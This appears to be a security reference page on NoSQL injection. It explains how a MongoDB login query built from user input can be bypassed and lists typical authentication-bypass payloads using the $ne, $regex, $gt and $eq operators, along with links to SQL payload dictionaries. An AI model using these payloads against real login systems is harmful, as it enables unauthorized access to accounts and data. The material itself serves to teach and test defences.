NoSQL injection

Related resources

• Detailed SQLi Cheat sheet for manual attack.
• SQL injection
• NoSQL injection
• SQLite injections

Dictionary for NoSQL injections.

Examples of NoSQL databases: redis, mongo.

Languages and dictionaries

Server	Dictionary
MySQL	MySQL payloads.
MSSQL	MSSQL payloads.
PostgreSQL	PostgreSQL payloads.
Oracle	Oracle SQL payloads.
SQLite	SQLite payloads.
Cassandra	Cassandra payloads.

Attack-based dictionaries

• Generic SQL Injection Payloads
• Generic Error Based Payloads.
• Generic Union Select Payloads.
• SQL time based payloads .
• SQL Injection Auth Bypass Payloads

SQL stands for Structure Query Language. NoSQL Injection is a security vulnerability that occurs in applications that utilize NoSQL databases. It is a type of attack that involves an attacker manipulating a NoSQL database query by injecting malicious input, leading to unauthorized access, data leakage, or unintended operations. In traditional SQL Injection attacks, attackers exploit vulnerabilities by inserting malicious SQL code into input fields that are concatenated with database queries. Similarly, in NoSQL Injection, attackers exploit weaknesses in the application's handling of user-supplied input to manipulate NoSQL database queries.

How does it work a NoSQL injection? Explanation:

# MongoDB query
var query = {
username: username,
password: password
};

# Perform query to check if credentials are valid
var result = db.users.findOne(query);

if (result) {
// Login successful
} else {
// Login failed

In this example, the application constructs a MongoDB query using user-supplied values for the username and password fields. If an attacker intentionally provides a specially crafted value, they could potentially exploit a NoSQL injection vulnerability. For instance, an attacker might enter the following value as the username parameter:

$gt:""

The attacker could potentially bypass the login mechanism and gain unauthorized access.

Typical payloads:

# Payload
username[$ne]=1$password[$ne]=1
# Use case/Function: Not equals to (Auth Bypass)                |

# Payload
username[$regex]=^adm$password[$ne]=1
# Use case/Function: Checks a regular expression (Auth Bypass)

# Payload
username[$regex]=.{25}&pass[$ne]=1
# Use case/Function: Checks regex to find the length of a value

# Payload
username[$eq]=admin&password[$ne]=1 
# Use case/Function: Equals to.

# Payload
username[$ne]=admin&pass[$gt]=s 
# Use case/Function: Greater than.

Example of a user search form:

With the not equal operator, it will return all users except for "admin".

Last update: 2025-01-14
Created: March 31, 2024 19:57:42